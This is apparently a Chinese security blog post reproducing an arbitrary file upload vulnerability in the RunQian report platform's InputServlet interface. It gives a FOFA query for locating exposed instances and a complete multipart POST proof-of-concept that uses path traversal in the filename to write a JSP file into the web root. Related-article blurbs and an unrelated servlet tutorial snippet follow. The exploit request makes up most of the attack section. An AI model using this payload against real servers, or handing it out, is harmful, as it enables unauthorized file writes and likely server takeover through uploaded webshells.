润乾报表前台InputServlet接口任意文件上传漏洞复现 [附POC]

最新推荐文章于 2024-07-25 16:28:58 发布
最新推荐文章于 2024-07-25 16:28:58 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现2 漏洞复现 文章标签: 系统安全 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48539059/article/details/140660326

文章目录

润乾报表前台InputServlet接口任意文件上传漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

润乾报表是一个纯JAVA的企业级报表工具,支持对J2EE系统的嵌入式部署,无缝集成。服务器端支持各种常见的操作系统,支持各种常见的关系数据库和各类J2 EE的应用服务器,客户端采用标准纯html方式展现,支持ie和netscape, 润乾报表是领先的企业级报表分析软件。其润乾报表前台InputServlet接口存在任意文件上传漏洞。

0x03 影响版本

润乾报表

0x04 漏洞环境

FOFA语法: body=“润乾报表” || body=“/raqsoft”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (POST)

POST /InputServlet?action=12 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 241
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="upsize"

1024
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\123.jsp"
Content-Type: image/jpeg

123321
--00content0boundary00--

3.复现

在这里插入图片描述访问文件上传地址:/123.jsp
在这里插入图片描述

漏洞复现】润乾报表InputServlet13文件读取漏洞
晚风不及你
04-27 491
润乾报表InputServlet13接口存在文件读取漏洞,攻击者可利用漏洞读取服务器的敏感信息。
漏洞复现】润乾报表InputServlet12文件上传漏洞
晚风不及你
04-27 381
润乾报表InputServlet12接口存在文件上传漏洞,攻击者可利用漏洞获取服务器权限。
漏洞复现】润乾报表 InputServlet 任意文件上传漏洞
qq_67810151的博客
04-11 1101
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
漏洞复现】先锋WEB燃气收费系统文件上传漏洞 1day
失心少年
01-12 260
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!访问http://ip:port/AjaxService/Upload.aspx验证。/AjaxService/Upload.aspx 存在任意文件上传漏洞。出现上面页面则证明漏洞存在。
漏洞复现】润乾报表 servlet/dataSphereServlet 任意文件上传漏洞
qq_67810151的博客
04-23 1053
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
润乾报表平台 InputServlet 任意文件读取漏洞复现
0xSec
04-15 858
润乾报表平台 InputServlet 接口存在任意文件未经漏洞,未经身份攻击者可通过该漏洞读取系统内部配置文件及敏感数据凭证,使系统处于极不安全状态
润乾报表平台 InputServlet 任意文件上传(含批量验证poc
weixin_43567873的博客
04-15 220
润乾报表平台 InputServlet 任意文件上传(含批量验证poc
【攻防演练】【含poc】润乾报表dataSphereServlet接口存在任意文件读取漏洞
zzxx191z的博客
07-25 430
dataSphereServlet接口任意文件上传,现补充一个dataSphereServlet接口任意文件读取。近期润乾1day已公开,目前发现已有InputServlet接口任意文件上传、读取以及。
润乾报表平台 InputServlet 任意文件上传漏洞复现
0xSec
04-11 577
润乾报表平台 InputServlet 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
润乾报表入门问题记录
freekaiQaQ的博客
02-27 948
1.查询数量(count)时,在设计的报表直接取就可以,报表生成的表达式有点问题。   2: 动态宏 拼接 日期参数   case(dateType,list("1"), if(@fromD==null&&@toD==null,""  @fromD!=null&&@toD==null,"to_char(t.release_Date,'yyyy-mm-dd')>=to_char('"
润乾报表4.0帮助文档
05-11
润乾报表4.0帮助文档 包括 润乾报表4.0应用开发.pdf 润乾报表4.0实用案例解析.pdf 润乾报表4.0填报专题.pdf 润乾报表4.0用户手册.pdf
动态 SQL 及安全性(Birt vs 润乾)
cainiao_M的博客
07-29 286
静态 SQL 与动态 SQL 对于题目中提到的动态 SQL,显然应该有一种静态 SQL 与之相对,那么两者应该怎么理解?我们先来个基本的认识。 静态 SQL 之“静态”,意味着在执行之前就已经明确了该 sql 在数据库执行后的业务含义,也就是对于做啥事儿我们是清楚的,只不过需要知道这事儿的具体内容有哪些。比如“select userID,username from users where de...
SRC挖掘日常3
jennycisp的博客
05-06 953
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。聊完宏观的,我们再落到具体的技术点上来,给你看看我给团队小伙伴制定的网络安全学习路线,整体大概半年左右,具体视每个人的情况而定。
报表的SQL植入风险及规避方法
cainiao_M的博客
06-28 363
互联网时代带来方便的同时也带来了安全隐患,各种安全问题可说是防不胜防,特别是大家日益关心的个人信息等方面,貌似很难有什么安全和隐私可言。 而在报表作为常用的信息载体,更是直接面临各种安全挑战,例如:SQL 植入。 什么是 SQL 植入?! 报表为啥会有 SQL 植入风险?! 能不能通过报表工具提供的功能避免 SQL 植入?! SQL 植入的概念 首先,认识一下什么是 sql 植入? ...
使用润乾报表的常见问题
热门推荐
艺术就是爆炸的专栏
08-12 1万+
最近工作需要,使用了润乾报表。润乾报表是一个纯JAVA的企业级报表工具,功能很强大,可以做很多事情,可以做非常复杂的报表,不过我用到的比较简单,所以这里也就总结了一些比较基本的操作。 设计器如何打开 如果是安装的,那么直接到菜单下,打开润乾报表设计器就行了,如果是压缩包或者从别人那儿拷过来的,就运行\reportHome\bin下面的startup.bat就可以打开了。 做一个报表需
报表中利用隐藏列对扩展格显示值求和
weixin_30354675的博客
04-17 268
在润乾报表中,获取报表中单元格显示值的函数是disp(),然而这个函数却无法计算扩展单元格的显示值。从而无法直接对扩展个显示值求和。 在下图中,需要计算D3单元格的显示值之和。 D3值为:ds1.再订购量 D3显示值为:value()+ds1.订购量 实现思路 虽然不能直接得到,但是润乾报表中可以使用隐藏单元格技术,将显示值转换为值,然后调用sum()函数,从而对...
帆软报表与润乾报表的破解策略
jackspring的博客
03-19 4879
简而言之,只做技术探讨,尔等细细体会。 1)破解工具: Javassist 2)破解思路: 润乾报表:润乾报表安全做的不怎么样,修改相应方法,将关键校验的false改为true即可。 帆软报表:帆软报表安全做的还可以,但是有个致命缺陷,就是并发为1的时候拥有完全的功能。他的破解思路最为简单,即修改源码中的并发判断逻辑,将所有请求的IP地址都改为某个固定值,如127.0.0.1。 最后,...
内存溢出的排查步骤与解决建议
guxinghan12345的专栏
01-16 2883
本文对使用报表过程中出现内存溢出问题进行简单地分析,给出一些建议性的排查步骤和解决方法。 排查步骤与解决办法 定位问题 首先我们要判断出现的问题是否是由于内存溢出引起的,典型的后台信息是带有Out Of Memory字样,但是也不排除其他内存溢出的提示,如tomcat内存溢出可出现三种提示信息:Java heap space、PermGen space和unable to create ne
因设置或设计上的缺陷引发的安全漏洞
tumi
07-19 456
因设置或设计上的缺陷引发的安全漏洞: 1、强制浏览(是指从安置在Web服务器的公开目录下的文件中,浏览那些原本非自愿公开的文件) 2、不正确的错误消息处理(是指Web应用的错误信息内包含对攻击者有用的信息) 3、开发重定向(是一种对指定的任意URL作重定向跳转的功能)...
编写用户实体类UserName.java,用户填写表单信息formin.jsp,提交给inputServlet,在Servlet中使用JavaBean存储表单信息,并且将表单信息展示在formout.jsp,再利用EL表达式获取JavaBean的属性并展示。
最新发布
12-05
首先,我们需要创建一个名为`UserName.java`的用户实体类,它通常是一个简单的Java类,包含用户的姓名属性和其他可能需要的数据字段: ```java // UserName.java import javax.persistence.Entity; import javax.persistence.GeneratedValue; import javax.persistence.GenerationType; import javax.persistence.Id; @Entity public class UserName { @Id @GeneratedValue(strategy = GenerationType.AUTO) private Long id; private String name; // getters and setters public Long getId() { return id; } public void setId(Long id) { this.id = id; } public String getName() { return name; } public void setName(String name) { this.name = name; } // constructor and toString method for better representation public UserName(String name) { this.name = name; } } ``` 接下来,用户会在`formin.jsp`表单页面上输入他们的信息: ```jsp <!-- formin.jsp --> <form action="inputServlet" method="post"> <label for="name">用户名:</label> <input type="text" id="name" name="username" value="" required><br> <!-- other form fields... --> <input type="submit" value="提交"> </form> ``` 当用户点击提交按钮时,表单数据会被发送到`inputServlet`。在这个Servlet中,我们将使用JavaBean(这里我们假设已经导入了UserModel包下的UserName类)来处理并存储这些信息: ```java // inputServlet.java (部分代码) import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.annotation.WebServlet; @WebServlet("/inputServlet") public class InputServlet extends HttpServlet { protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String username = request.getParameter("username"); User user = new UserName(username); // Assuming you have a UserService or similar to store the user object userService.saveUser(user); request.getRequestDispatcher("formout.jsp").forward(request, response); } } ``` 然后,`formout.jsp`会显示保存的表单信息,并通过EL表达式获取JavaBean的属性: ```jsp <!-- formout.jsp --> <%@ page contentType="text/html;charset=UTF-8"%> <html> <body> <%@ include file="header.jsp" %> <h2>User Information:</h2> <p>用户名: ${user.name}</p> <!-- display any additional attributes as needed --> <p>Email: ${user.email} (假设email也是一个属性)</p> </body> </html> ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值